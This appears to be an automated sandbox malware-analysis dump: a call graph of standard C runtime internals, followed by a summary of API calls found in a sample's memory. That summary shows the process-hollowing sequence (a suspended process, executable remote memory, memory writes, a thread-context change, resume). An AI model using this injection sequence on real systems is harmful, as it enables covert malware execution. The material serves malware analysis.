calls 16703->16704 16705 1392db 16704->16705 16713 13f79c 16705->16713 16707 1392e0 16723 13f847 16707->16723 16710 13930a 16711 13efd8 ___free_lconv_mon 14 API calls 16710->16711 16712 139315 16711->16712 16714 13f7a8 ___scrt_is_nonwritable_in_current_image 16713->16714 16727 13a8b5 EnterCriticalSection 16714->16727 16716 13f81f 16734 13f83e 16716->16734 16719 13f7f3 DeleteCriticalSection 16720 13efd8 ___free_lconv_mon 14 API calls 16719->16720 16722 13f7b3 16720->16722 16722->16716 16722->16719 16728 1394b2 16722->16728 16724 1392ef DeleteCriticalSection 16723->16724 16725 13f85e 16723->16725 16724->16707 16724->16710 16725->16724 16726 13efd8 ___free_lconv_mon 14 API calls 16725->16726 16726->16724 16727->16722 16729 1394c5 _Fputc 16728->16729 16737 13938d 16729->16737 16731 1394d1 16732 138e3b _Fputc 41 API calls 16731->16732 16733 1394dd 16732->16733 16733->16722 16809 13a8fd LeaveCriticalSection 16734->16809 16736 13f82b 16736->16707 16738 139399 ___scrt_is_nonwritable_in_current_image 16737->16738 16739 1393a3 16738->16739 16740 1393c6 16738->16740 16741 139085 _Fputc 29 API calls 16739->16741 16747 1393be 16740->16747 16748 139365 EnterCriticalSection 16740->16748 16741->16747 16743 1393e4 16749 139424 16743->16749 16745 1393f1 16763 13941c 16745->16763 16747->16731 16748->16743 16750 139431 16749->16750 16751 139454 16749->16751 16752 139085 _Fputc 29 API calls 16750->16752 16753 13971f ___scrt_uninitialize_crt 66 API calls 16751->16753 16761 13944c 16751->16761 16752->16761 16754 13946c 16753->16754 16755 13f847 14 API calls 16754->16755 16756 139474 16755->16756 16757 13fa79 _Fputc 41 API calls 16756->16757 16758 139480 16757->16758 16766 13fb31 16758->16766 16761->16745 16762 13efd8 ___free_lconv_mon 14 API calls 16762->16761 16808 139379 LeaveCriticalSection 16763->16808 16765 139422 16765->16747 16767 13fb5a 16766->16767 16770 139487 16766->16770 16768 13fba9 16767->16768 16771 13fb81 16767->16771 16769 139085 _Fputc 29 API calls 16768->16769 
16769->16770 16770->16761 16770->16762 16773 13faa0 16771->16773 16774 13faac ___scrt_is_nonwritable_in_current_image 16773->16774 16781 14578d EnterCriticalSection 16774->16781 16776 13faba 16778 13faeb 16776->16778 16782 13fbd4 16776->16782 16795 13fb25 16778->16795 16781->16776 16783 145864 __fread_nolock 41 API calls 16782->16783 16786 13fbe4 16783->16786 16784 13fbea 16798 1457d3 16784->16798 16786->16784 16787 13fc1c 16786->16787 16788 145864 __fread_nolock 41 API calls 16786->16788 16787->16784 16789 145864 __fread_nolock 41 API calls 16787->16789 16791 13fc13 16788->16791 16790 13fc28 CloseHandle 16789->16790 16790->16784 16792 13fc34 GetLastError 16790->16792 16793 145864 __fread_nolock 41 API calls 16791->16793 16792->16784 16793->16787 16794 13fc42 __fread_nolock 16794->16778 16807 1457b0 LeaveCriticalSection 16795->16807 16797 13fb0e 16797->16770 16799 1457e2 16798->16799 16800 145849 16798->16800 16799->16800 16805 14580c 16799->16805 16801 13b318 __strnicoll 14 API calls 16800->16801 16802 14584e 16801->16802 16803 13b305 __dosmaperr 14 API calls 16802->16803 16804 145839 16803->16804 16804->16794 16805->16804 16806 145833 SetStdHandle 16805->16806 16806->16804 16807->16797 16808->16765 16809->16736 13679 144ee4 13680 144eed 13679->13680 13681 144f1f 13679->13681 13685 13ed4b 13680->13685 13686 13ed56 13685->13686 13687 13ed5c 13685->13687 13736 13f4c4 13686->13736 13691 13ed62 13687->13691 13741 13f503 13687->13741 13693 13ed67 13691->13693 13764 13b237 13691->13764 13692 13ed7a 13746 13ef7b 13692->13746 13713 144cef 13693->13713 13698 13eda3 13700 13f503 __Getctype 6 API calls 13698->13700 13699 13ed8e 13701 13f503 __Getctype 6 API calls 13699->13701 13702 13edaf 13700->13702 13703 13ed9a 13701->13703 13704 13edb3 13702->13704 13705 13edc2 13702->13705 13753 13efd8 13703->13753 13706 13f503 __Getctype 6 API calls 13704->13706 13759 13eabe 13705->13759 13706->13703 13711 13efd8 ___free_lconv_mon 14 API calls 13712 13edd4 13711->13712 13712->13693 
14205 144e44 13713->14205 13718 144d32 13718->13681 13721 144d59 14232 144f3f 13721->14232 13722 144d4b 13723 13efd8 ___free_lconv_mon 14 API calls 13722->13723 13723->13718 13726 144d91 13728 13b318 __strnicoll 14 API calls 13726->13728 13727 144dac 13730 144dd8 13727->13730 13735 13efd8 ___free_lconv_mon 14 API calls 13727->13735 13729 144d96 13728->13729 13731 13efd8 ___free_lconv_mon 14 API calls 13729->13731 13732 144e21 13730->13732 14243 144961 13730->14243 13731->13718 13734 13efd8 ___free_lconv_mon 14 API calls 13732->13734 13734->13718 13735->13730 13775 13f2b3 13736->13775 13739 13f4fb TlsGetValue 13740 13f4e9 13740->13687 13742 13f2b3 std::_Lockit::_Lockit 5 API calls 13741->13742 13743 13f51f 13742->13743 13744 13ed76 13743->13744 13745 13f53d TlsSetValue 13743->13745 13744->13691 13744->13692 13751 13ef88 __Getctype 13746->13751 13747 13efc8 13793 13b318 13747->13793 13748 13efb3 HeapAlloc 13749 13ed86 13748->13749 13748->13751 13749->13698 13749->13699 13751->13747 13751->13748 13790 13dc55 13751->13790 13754 13efe3 HeapFree 13753->13754 13758 13eda0 13753->13758 13755 13eff8 GetLastError 13754->13755 13754->13758 13756 13f005 __dosmaperr 13755->13756 13757 13b318 __strnicoll 12 API calls 13756->13757 13757->13758 13758->13691 13830 13e952 13759->13830 13972 142f8a 13764->13972 13767 13b247 13769 13b270 13767->13769 13770 13b251 IsProcessorFeaturePresent 13767->13770 14008 13c42e 13769->14008 13771 13b25d 13770->13771 14002 138f06 13771->14002 13776 13f2e1 13775->13776 13777 13f2dd 13775->13777 13776->13777 13782 13f1e8 13776->13782 13777->13739 13777->13740 13780 13f2fb GetProcAddress 13780->13777 13781 13f30b std::_Lockit::_Lockit 13780->13781 13781->13777 13788 13f1f9 ___vcrt_FlsFree 13782->13788 13783 13f28f 13783->13777 13783->13780 13784 13f217 LoadLibraryExW 13785 13f232 GetLastError 13784->13785 13786 13f296 13784->13786 13785->13788 13786->13783 13787 13f2a8 FreeLibrary 13786->13787 13787->13783 13788->13783 13788->13784 13789 13f265 
LoadLibraryExW 13788->13789 13789->13786 13789->13788 13796 13dc82 13790->13796 13807 13ede1 GetLastError 13793->13807 13795 13b31d 13795->13749 13797 13dc8e ___scrt_is_nonwritable_in_current_image 13796->13797 13802 13a8b5 EnterCriticalSection 13797->13802 13799 13dc99 13803 13dcd5 13799->13803 13802->13799 13806 13a8fd LeaveCriticalSection 13803->13806 13805 13dc60 13805->13751 13806->13805 13808 13edf7 13807->13808 13811 13edfd 13807->13811 13809 13f4c4 __Getctype 6 API calls 13808->13809 13809->13811 13810 13f503 __Getctype 6 API calls 13812 13ee19 13810->13812 13811->13810 13828 13ee01 SetLastError 13811->13828 13813 13ef7b __Getctype 12 API calls 13812->13813 13812->13828 13815 13ee2e 13813->13815 13816 13ee47 13815->13816 13817 13ee36 13815->13817 13819 13f503 __Getctype 6 API calls 13816->13819 13818 13f503 __Getctype 6 API calls 13817->13818 13820 13ee44 13818->13820 13821 13ee53 13819->13821 13825 13efd8 ___free_lconv_mon 12 API calls 13820->13825 13822 13ee57 13821->13822 13823 13ee6e 13821->13823 13824 13f503 __Getctype 6 API calls 13822->13824 13826 13eabe __Getctype 12 API calls 13823->13826 13824->13820 13825->13828 13827 13ee79 13826->13827 13829 13efd8 ___free_lconv_mon 12 API calls 13827->13829 13828->13795 13829->13828 13831 13e95e ___scrt_is_nonwritable_in_current_image 13830->13831 13844 13a8b5 EnterCriticalSection 13831->13844 13833 13e968 13845 13e998 13833->13845 13836 13ea64 13837 13ea70 ___scrt_is_nonwritable_in_current_image 13836->13837 13849 13a8b5 EnterCriticalSection 13837->13849 13839 13ea7a 13850 13ec45 13839->13850 13841 13ea92 13854 13eab2 13841->13854 13844->13833 13848 13a8fd LeaveCriticalSection 13845->13848 13847 13e986 13847->13836 13848->13847 13849->13839 13851 13ec7b __Getctype 13850->13851 13852 13ec54 __Getctype 13850->13852 13851->13841 13852->13851 13857 14662e 13852->13857 13971 13a8fd LeaveCriticalSection 13854->13971 13856 13eaa0 13856->13711 13859 1466ae 13857->13859 13860 146644 13857->13860 13861 13efd8 
___free_lconv_mon 14 API calls 13859->13861 13883 1466fc 13859->13883 13860->13859 13863 146677 13860->13863 13867 13efd8 ___free_lconv_mon 14 API calls 13860->13867 13862 1466d0 13861->13862 13865 13efd8 ___free_lconv_mon 14 API calls 13862->13865 13864 146699 13863->13864 13873 13efd8 ___free_lconv_mon 14 API calls 13863->13873 13866 13efd8 ___free_lconv_mon 14 API calls 13864->13866 13868 1466e3 13865->13868 13869 1466a3 13866->13869 13871 14666c 13867->13871 13874 13efd8 ___free_lconv_mon 14 API calls 13868->13874 13875 13efd8 ___free_lconv_mon 14 API calls 13869->13875 13870 14676a 13876 13efd8 ___free_lconv_mon 14 API calls 13870->13876 13885 1458e4 13871->13885 13872 14670a 13872->13870 13884 13efd8 14 API calls ___free_lconv_mon 13872->13884 13878 14668e 13873->13878 13879 1466f1 13874->13879 13875->13859 13882 146770 13876->13882 13913 145d98 13878->13913 13881 13efd8 ___free_lconv_mon 14 API calls 13879->13881 13881->13883 13882->13851 13925 14679f 13883->13925 13884->13872 13886 1458f5 13885->13886 13912 1459de 13885->13912 13887 145906 13886->13887 13888 13efd8 ___free_lconv_mon 14 API calls 13886->13888 13889 145918 13887->13889 13890 13efd8 ___free_lconv_mon 14 API calls 13887->13890 13888->13887 13891 14592a 13889->13891 13892 13efd8 ___free_lconv_mon 14 API calls 13889->13892 13890->13889 13893 13efd8 ___free_lconv_mon 14 API calls 13891->13893 13894 14593c 13891->13894 13892->13891 13893->13894 13895 13efd8 ___free_lconv_mon 14 API calls 13894->13895 13897 14594e 13894->13897 13895->13897 13896 145960 13899 145972 13896->13899 13900 13efd8 ___free_lconv_mon 14 API calls 13896->13900 13897->13896 13898 13efd8 ___free_lconv_mon 14 API calls 13897->13898 13898->13896 13901 145984 13899->13901 13902 13efd8 ___free_lconv_mon 14 API calls 13899->13902 13900->13899 13903 145996 13901->13903 13904 13efd8 ___free_lconv_mon 14 API calls 13901->13904 13902->13901 13905 1459a8 13903->13905 13906 13efd8 ___free_lconv_mon 14 API calls 13903->13906 13904->13903 
13907 1459ba 13905->13907 13908 13efd8 ___free_lconv_mon 14 API calls 13905->13908 13906->13905 13909 1459cc 13907->13909 13910 13efd8 ___free_lconv_mon 14 API calls 13907->13910 13908->13907 13911 13efd8 ___free_lconv_mon 14 API calls 13909->13911 13909->13912 13910->13909 13911->13912 13912->13863 13914 145da5 13913->13914 13924 145dfd 13913->13924 13915 145db5 13914->13915 13916 13efd8 ___free_lconv_mon 14 API calls 13914->13916 13917 13efd8 ___free_lconv_mon 14 API calls 13915->13917 13918 145dc7 13915->13918 13916->13915 13917->13918 13919 145dd9 13918->13919 13920 13efd8 ___free_lconv_mon 14 API calls 13918->13920 13921 145deb 13919->13921 13922 13efd8 ___free_lconv_mon 14 API calls 13919->13922 13920->13919 13923 13efd8 ___free_lconv_mon 14 API calls 13921->13923 13921->13924 13922->13921 13923->13924 13924->13864 13926 1467cb 13925->13926 13927 1467ac 13925->13927 13926->13872 13927->13926 13931 1462b3 13927->13931 13930 13efd8 ___free_lconv_mon 14 API calls 13930->13926 13932 1462c4 13931->13932 13966 146391 13931->13966 13967 146012 13932->13967 13935 146012 __Getctype 14 API calls 13936 1462d7 13935->13936 13937 146012 __Getctype 14 API calls 13936->13937 13938 1462e2 13937->13938 13939 146012 __Getctype 14 API calls 13938->13939 13940 1462ed 13939->13940 13941 146012 __Getctype 14 API calls 13940->13941 13942 1462fb 13941->13942 13943 13efd8 ___free_lconv_mon 14 API calls 13942->13943 13944 146306 13943->13944 13945 13efd8 ___free_lconv_mon 14 API calls 13944->13945 13946 146311 13945->13946 13947 13efd8 ___free_lconv_mon 14 API calls 13946->13947 13948 14631c 13947->13948 13949 146012 __Getctype 14 API calls 13948->13949 13950 14632a 13949->13950 13951 146012 __Getctype 14 API calls 13950->13951 13952 146338 13951->13952 13953 146012 __Getctype 14 API calls 13952->13953 13954 146349 13953->13954 13955 146012 __Getctype 14 API calls 13954->13955 13956 146357 13955->13956 13957 146012 __Getctype 14 API calls 13956->13957 13958 146365 13957->13958 13959 
13efd8 ___free_lconv_mon 14 API calls 13958->13959 13960 146370 13959->13960 13961 13efd8 ___free_lconv_mon 14 API calls 13960->13961 13962 14637b 13961->13962 13963 13efd8 ___free_lconv_mon 14 API calls 13962->13963 13964 146386 13963->13964 13965 13efd8 ___free_lconv_mon 14 API calls 13964->13965 13965->13966 13966->13930 13968 146024 13967->13968 13969 146033 13968->13969 13970 13efd8 ___free_lconv_mon 14 API calls 13968->13970 13969->13935 13970->13968 13971->13856 14011 142ebc 13972->14011 13975 142fcf 13976 142fdb ___scrt_is_nonwritable_in_current_image 13975->13976 13977 13ede1 __strnicoll 14 API calls 13976->13977 13980 143008 __purecall 13976->13980 13982 143002 __purecall 13976->13982 13977->13982 13978 14304f 13979 13b318 __strnicoll 14 API calls 13978->13979 13981 143054 13979->13981 13984 14307b 13980->13984 14025 13a8b5 EnterCriticalSection 13980->14025 14022 139102 13981->14022 13982->13978 13982->13980 14001 143039 13982->14001 13987 1430bd 13984->13987 13988 1431ae 13984->13988 13998 1430ec 13984->13998 13987->13998 14026 13ec90 GetLastError 13987->14026 13990 1431b9 13988->13990 14057 13a8fd LeaveCriticalSection 13988->14057 13991 13c42e __purecall 23 API calls 13990->13991 13993 1431c1 13991->13993 13995 13ec90 __Getctype 41 API calls 13999 143141 13995->13999 13997 13ec90 __Getctype 41 API calls 13997->13998 14053 14315b 13998->14053 14000 13ec90 __Getctype 41 API calls 13999->14000 13999->14001 14000->14001 14001->13767 14003 138f22 __fread_nolock __purecall 14002->14003 14004 138f4e IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 14003->14004 14007 13901f __purecall 14004->14007 14006 13903d 14006->13769 14120 134956 14007->14120 14128 13c252 14008->14128 14012 142ec8 ___scrt_is_nonwritable_in_current_image 14011->14012 14017 13a8b5 EnterCriticalSection 14012->14017 14014 142ed6 14018 142f14 14014->14018 14017->14014 14021 13a8fd LeaveCriticalSection 14018->14021 14020 13b23c 14020->13767 14020->13975 14021->14020 14058 
13904e 14022->14058 14025->13984 14027 13eca6 14026->14027 14032 13ecac 14026->14032 14029 13f4c4 __Getctype 6 API calls 14027->14029 14028 13f503 __Getctype 6 API calls 14030 13ecc8 14028->14030 14029->14032 14031 13ecb0 SetLastError 14030->14031 14034 13ef7b __Getctype 14 API calls 14030->14034 14036 13ed40 14031->14036 14037 13ed45 14031->14037 14032->14028 14032->14031 14035 13ecdd 14034->14035 14038 13ecf6 14035->14038 14039 13ece5 14035->14039 14036->13997 14040 13b237 __purecall 39 API calls 14037->14040 14042 13f503 __Getctype 6 API calls 14038->14042 14041 13f503 __Getctype 6 API calls 14039->14041 14043 13ed4a 14040->14043 14044 13ecf3 14041->14044 14045 13ed02 14042->14045 14048 13efd8 ___free_lconv_mon 14 API calls 14044->14048 14046 13ed06 14045->14046 14047 13ed1d 14045->14047 14050 13f503 __Getctype 6 API calls 14046->14050 14049 13eabe __Getctype 14 API calls 14047->14049 14048->14031 14051 13ed28 14049->14051 14050->14044 14052 13efd8 ___free_lconv_mon 14 API calls 14051->14052 14052->14031 14054 143161 14053->14054 14055 143132 14053->14055 14119 13a8fd LeaveCriticalSection 14054->14119 14055->13995 14055->13999 14055->14001 14057->13990 14059 139060 _Fputc 14058->14059 14064 139085 14059->14064 14065 13909c 14064->14065 14066 139095 14064->14066 14068 139078 14065->14068 14083 138e77 14065->14083 14079 138ea0 GetLastError 14066->14079 14073 138e3b 14068->14073 14070 1390d1 14070->14068 14086 13912f IsProcessorFeaturePresent 14070->14086 14072 139101 14074 138e47 14073->14074 14075 138e5e 14074->14075 14112 138ee6 14074->14112 14077 138e71 14075->14077 14078 138ee6 _Fputc 41 API calls 14075->14078 14077->14001 14078->14077 14080 138eb9 14079->14080 14090 13ee92 14080->14090 14084 138e82 GetLastError SetLastError 14083->14084 14085 138e9b 14083->14085 14084->14070 14085->14070 14087 13913b 14086->14087 14088 138f06 __purecall 8 API calls 14087->14088 14089 139150 GetCurrentProcess TerminateProcess 14088->14089 14089->14072 14091 13eea5 14090->14091 
14092 13eeab 14090->14092 14093 13f4c4 __Getctype 6 API calls 14091->14093 14094 13f503 __Getctype 6 API calls 14092->14094 14096 138ed1 SetLastError 14092->14096 14093->14092 14095 13eec5 14094->14095 14095->14096 14097 13ef7b __Getctype 14 API calls 14095->14097 14096->14065 14098 13eed5 14097->14098 14099 13eef2 14098->14099 14100 13eedd 14098->14100 14102 13f503 __Getctype 6 API calls 14099->14102 14101 13f503 __Getctype 6 API calls 14100->14101 14110 13eee9 14101->14110 14103 13eefe 14102->14103 14104 13ef02 14103->14104 14105 13ef11 14103->14105 14108 13f503 __Getctype 6 API calls 14104->14108 14106 13eabe __Getctype 14 API calls 14105->14106 14109 13ef1c 14106->14109 14107 13efd8 ___free_lconv_mon 14 API calls 14107->14096 14108->14110 14111 13efd8 ___free_lconv_mon 14 API calls 14109->14111 14110->14107 14111->14096 14113 138ef0 14112->14113 14114 138ef9 14112->14114 14115 138ea0 _Fputc 16 API calls 14113->14115 14114->14075 14116 138ef5 14115->14116 14116->14114 14117 13b237 __purecall 41 API calls 14116->14117 14118 138f02 14117->14118 14119->14055 14121 13495f IsProcessorFeaturePresent 14120->14121 14122 13495e 14120->14122 14124 135274 14121->14124 14122->14006 14127 135237 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 14124->14127 14126 135357 14126->14006 14127->14126 14129 13c291 14128->14129 14130 13c27f 14128->14130 14140 13c11a 14129->14140 14155 13c31a GetModuleHandleW 14130->14155 14135 13b27a 14139 13c2e3 14141 13c126 ___scrt_is_nonwritable_in_current_image 14140->14141 14163 13a8b5 EnterCriticalSection 14141->14163 14143 13c130 14164 13c167 14143->14164 14145 13c13d 14168 13c15b 14145->14168 14148 13c2e9 14193 13c35d 14148->14193 14151 13c307 14153 13c37f __purecall 3 API calls 14151->14153 14152 13c2f7 GetCurrentProcess TerminateProcess 14152->14151 14154 13c30f ExitProcess 14153->14154 14156 13c284 14155->14156 14156->14129 14157 13c37f GetModuleHandleExW 14156->14157 14158 13c3df 14157->14158 14159 
13c3be GetProcAddress 14157->14159 14160 13c3e5 FreeLibrary 14158->14160 14161 13c290 14158->14161 14159->14158 14162 13c3d2 14159->14162 14160->14161 14161->14129 14162->14158 14163->14143 14165 13c173 ___scrt_is_nonwritable_in_current_image 14164->14165 14166 13c1da __purecall 14165->14166 14171 13df86 14165->14171 14166->14145 14192 13a8fd LeaveCriticalSection 14168->14192 14170 13c149 14170->14135 14170->14148 14172 13df92 __EH_prolog3 14171->14172 14175 13dcde 14172->14175 14174 13dfb9 ctype 14174->14166 14176 13dcea ___scrt_is_nonwritable_in_current_image 14175->14176 14183 13a8b5 EnterCriticalSection 14176->14183 14178 13dcf8 14184 13de96 14178->14184 14183->14178 14185 13deb5 14184->14185 14186 13dd05 14184->14186 14185->14186 14187 13efd8 ___free_lconv_mon 14 API calls 14185->14187 14188 13dd2d 14186->14188 14187->14186 14191 13a8fd LeaveCriticalSection 14188->14191 14190 13dd16 14190->14174 14191->14190 14192->14170 14198 14560e GetPEB 14193->14198 14196 13c367 GetPEB 14197 13c2f3 14196->14197 14197->14151 14197->14152 14199 13c362 14198->14199 14200 145628 14198->14200 14199->14196 14199->14197 14202 13f336 14200->14202 14203 13f2b3 std::_Lockit::_Lockit 5 API calls 14202->14203 14204 13f352 14203->14204 14204->14199 14206 144e50 ___scrt_is_nonwritable_in_current_image 14205->14206 14212 144e6a 14206->14212 14251 13a8b5 EnterCriticalSection 14206->14251 14209 13b237 __purecall 41 API calls 14213 144ee3 14209->14213 14210 144d19 14216 144a6f 14210->14216 14211 144ea6 14252 144ec3 14211->14252 14212->14209 14212->14210 14214 144e7a 14214->14211 14215 13efd8 ___free_lconv_mon 14 API calls 14214->14215 14215->14211 14256 13b32b 14216->14256 14219 144a90 GetOEMCP 14221 144ab9 14219->14221 14220 144aa2 14220->14221 14222 144aa7 GetACP 14220->14222 14221->13718 14223 142001 14221->14223 14222->14221 14224 14203f 14223->14224 14225 14200f 14223->14225 14226 13b318 __strnicoll 14 API calls 14224->14226 14227 14202a HeapAlloc 14225->14227 14230 142013 __Getctype 
14225->14230 14229 142044 14226->14229 14228 14203d 14227->14228 14227->14230 14228->14229 14229->13721 14229->13722 14230->14224 14230->14227 14231 13dc55 ctype 2 API calls 14230->14231 14231->14230 14233 144a6f 43 API calls 14232->14233 14234 144f5f 14233->14234 14236 144f9c IsValidCodePage 14234->14236 14240 144fd8 __fread_nolock 14234->14240 14235 134956 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 14237 144d86 14235->14237 14238 144fae 14236->14238 14236->14240 14237->13726 14237->13727 14239 144fdd GetCPInfo 14238->14239 14242 144fb7 __fread_nolock 14238->14242 14239->14240 14239->14242 14240->14235 14299 144b43 14242->14299 14244 14496d ___scrt_is_nonwritable_in_current_image 14243->14244 14389 13a8b5 EnterCriticalSection 14244->14389 14246 144977 14390 1449ae 14246->14390 14251->14214 14255 13a8fd LeaveCriticalSection 14252->14255 14254 144eca 14254->14212 14255->14254 14257 13b349 14256->14257 14263 13b342 14256->14263 14258 13ec90 __Getctype 41 API calls 14257->14258 14257->14263 14259 13b36a 14258->14259 14264 1426fa 14259->14264 14263->14219 14263->14220 14265 14270d 14264->14265 14267 13b380 14264->14267 14265->14267 14272 14687a 14265->14272 14268 142758 14267->14268 14269 142780 14268->14269 14270 14276b 14268->14270 14269->14263 14270->14269 14294 144f2c 14270->14294 14273 146886 ___scrt_is_nonwritable_in_current_image 14272->14273 14274 13ec90 __Getctype 41 API calls 14273->14274 14275 14688f 14274->14275 14276 1468d5 14275->14276 14285 13a8b5 EnterCriticalSection 14275->14285 14276->14267 14278 1468ad 14286 1468fb 14278->14286 14283 13b237 __purecall 41 API calls 14284 1468fa 14283->14284 14285->14278 14287 1468be 14286->14287 14288 146909 __Getctype 14286->14288 14290 1468da 14287->14290 14288->14287 14289 14662e __Getctype 14 API calls 14288->14289 14289->14287 14293 13a8fd LeaveCriticalSection 14290->14293 14292 1468d1 14292->14276 14292->14283 14293->14292 14295 13ec90 __Getctype 41 API calls 14294->14295 14296 144f31 
14295->14296 14297 144e44 __strnicoll 41 API calls 14296->14297 14298 144f3c 14297->14298 14298->14269 14300 144b6b GetCPInfo 14299->14300 14301 144c34 14299->14301 14300->14301 14306 144b83 14300->14306 14302 134956 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 14301->14302 14304 144ced 14302->14304 14304->14240 14310 142b18 14306->14310 14309 142e0f 46 API calls 14309->14301 14311 13b32b __strnicoll 41 API calls 14310->14311 14312 142b38 14311->14312 14330 143db8 14312->14330 14314 142bfc 14317 134956 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 14314->14317 14315 142bf4 14333 1346a9 14315->14333 14316 142b65 14316->14314 14316->14315 14319 142001 std::_Locinfo::_Locinfo_ctor 15 API calls 14316->14319 14321 142b8a __fread_nolock __alloca_probe_16 14316->14321 14320 142c1f 14317->14320 14319->14321 14325 142e0f 14320->14325 14321->14315 14322 143db8 __strnicoll MultiByteToWideChar 14321->14322 14323 142bd5 14322->14323 14323->14315 14324 142be0 GetStringTypeW 14323->14324 14324->14315 14326 13b32b __strnicoll 41 API calls 14325->14326 14327 142e22 14326->14327 14340 142c21 14327->14340 14331 143dc9 MultiByteToWideChar 14330->14331 14331->14316 14334 1346b3 14333->14334 14335 1346c4 14333->14335 14334->14335 14337 13a859 14334->14337 14335->14314 14338 13efd8 ___free_lconv_mon 14 API calls 14337->14338 14339 13a871 14338->14339 14339->14335 14341 142c3c ctype 14340->14341 14342 143db8 __strnicoll MultiByteToWideChar 14341->14342 14345 142c82 14342->14345 14343 142dfa 14344 134956 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 14343->14344 14346 142e0d 14344->14346 14345->14343 14347 142001 std::_Locinfo::_Locinfo_ctor 15 API calls 14345->14347 14349 142ca8 __alloca_probe_16 14345->14349 14356 142d2e 14345->14356 14346->14309 14347->14349 14348 1346a9 __freea 14 API calls 14348->14343 14350 143db8 __strnicoll MultiByteToWideChar 14349->14350 14349->14356 14351 142ced 14350->14351 14351->14356 
14368 13f682 14351->14368 14354 142d57 14357 142de2 14354->14357 14358 142001 std::_Locinfo::_Locinfo_ctor 15 API calls 14354->14358 14361 142d69 __alloca_probe_16 14354->14361 14355 142d1f 14355->14356 14360 13f682 std::_Locinfo::_Locinfo_ctor 7 API calls 14355->14360 14356->14348 14359 1346a9 __freea 14 API calls 14357->14359 14358->14361 14359->14356 14360->14356 14361->14357 14362 13f682 std::_Locinfo::_Locinfo_ctor 7 API calls 14361->14362 14363 142dac 14362->14363 14363->14357 14377 143e34 14363->14377 14365 142dc6 14365->14357 14366 142dcf 14365->14366 14367 1346a9 __freea 14 API calls 14366->14367 14367->14356 14380 13f1b4 14368->14380 14371 13f693 LCMapStringEx 14376 13f6da 14371->14376 14372 13f6ba 14383 13f6df 14372->14383 14375 13f6d3 LCMapStringW 14375->14376 14376->14354 14376->14355 14376->14356 14379 143e4b WideCharToMultiByte 14377->14379 14379->14365 14381 13f2b3 std::_Lockit::_Lockit 5 API calls 14380->14381 14382 13f1ca 14381->14382 14382->14371 14382->14372 14386 13f1ce 14383->14386 14385 13f6ea __strnicoll 14385->14375 14387 13f2b3 std::_Lockit::_Lockit 5 API calls 14386->14387 14388 13f1e4 14387->14388 14388->14385 14389->14246 14400 139e1c 14390->14400 14392 1449d0 14393 139e1c __fread_nolock 41 API calls 14392->14393 14394 1449ef 14393->14394 14395 13efd8 ___free_lconv_mon 14 API calls 14394->14395 14396 144984 14394->14396 14395->14396 14397 1449a2 14396->14397 14414 13a8fd LeaveCriticalSection 14397->14414 14399 144990 14399->13732 14401 139e2d 14400->14401 14410 139e29 _Yarn 14400->14410 14402 139e34 14401->14402 14405 139e47 __fread_nolock 14401->14405 14403 13b318 __strnicoll 14 API calls 14402->14403 14404 139e39 14403->14404 14406 139102 __strnicoll 41 API calls 14404->14406 14407 139e75 14405->14407 14408 139e7e 14405->14408 14405->14410 14406->14410 14409 13b318 __strnicoll 14 API calls 14407->14409 14408->14410 14412 13b318 __strnicoll 14 API calls 14408->14412 14411 139e7a 14409->14411 14410->14392 14413 139102 __strnicoll 41 API 
calls 14411->14413 14412->14411 14413->14410 14414->14399 18330 13f9ed 18331 13f9f9 ___scrt_is_nonwritable_in_current_image 18330->18331 18342 13a8b5 EnterCriticalSection 18331->18342 18333 13fa00 18343 1456ef 18333->18343 18335 13fa1e 18367 13fa44 18335->18367 18342->18333 18344 1456fb ___scrt_is_nonwritable_in_current_image 18343->18344 18345 145704 18344->18345 18346 145725 18344->18346 18348 13b318 __strnicoll 14 API calls 18345->18348 18370 13a8b5 EnterCriticalSection 18346->18370 18349 145709 18348->18349 18350 139102 __strnicoll 41 API calls 18349->18350 18351 13fa0f 18350->18351 18351->18335 18356 13f887 GetStartupInfoW 18351->18356 18352 14575d 18378 145784 18352->18378 18353 145731 18353->18352 18371 14563f 18353->18371 18357 13f8a4 18356->18357 18359 13f938 18356->18359 18358 1456ef 42 API calls 18357->18358 18357->18359 18360 13f8cc 18358->18360 18362 13f93d 18359->18362 18360->18359 18361 13f8fc GetFileType 18360->18361 18361->18360 18363 13f944 18362->18363 18364 13f987 GetStdHandle 18363->18364 18365 13f9e9 18363->18365 18366 13f99a GetFileType 18363->18366 18364->18363 18365->18335 18366->18363 18382 13a8fd LeaveCriticalSection 18367->18382 18369 13fa2f 18370->18353 18372 13ef7b __Getctype 14 API calls 18371->18372 18373 145651 18372->18373 18376 13f5c0 6 API calls 18373->18376 18377 14565e 18373->18377 18374 13efd8 ___free_lconv_mon 14 API calls 18375 1456b3 18374->18375 18375->18353 18376->18373 18377->18374 18381 13a8fd LeaveCriticalSection 18378->18381 18380 14578b 18380->18351 18381->18380 18382->18369

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • CreateProcessA.KERNELBASE(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 00C402FC
                                                                            • VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 00C4030F
                                                                            • Wow64GetThreadContext.KERNEL32(?,00000000), ref: 00C4032D
                                                                            • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00C40351
                                                                            • VirtualAllocEx.KERNELBASE(?,?,?,00003000,00000040), ref: 00C4037C
                                                                            • WriteProcessMemory.KERNELBASE(?,00000000,?,?,00000000,?), ref: 00C403D4
                                                                            • WriteProcessMemory.KERNELBASE(?,?,?,?,00000000,?,00000028), ref: 00C4041F
                                                                            • WriteProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00C4045D
                                                                            • Wow64SetThreadContext.KERNEL32(?,?), ref: 00C40499
                                                                            • ResumeThread.KERNELBASE(?), ref: 00C404A8
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2051654125.0000000000C40000.00000040.00001000.00020000.00000000.sdmp, Offset: 00C40000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_c40000_file.jbxd
                                                                            Similarity
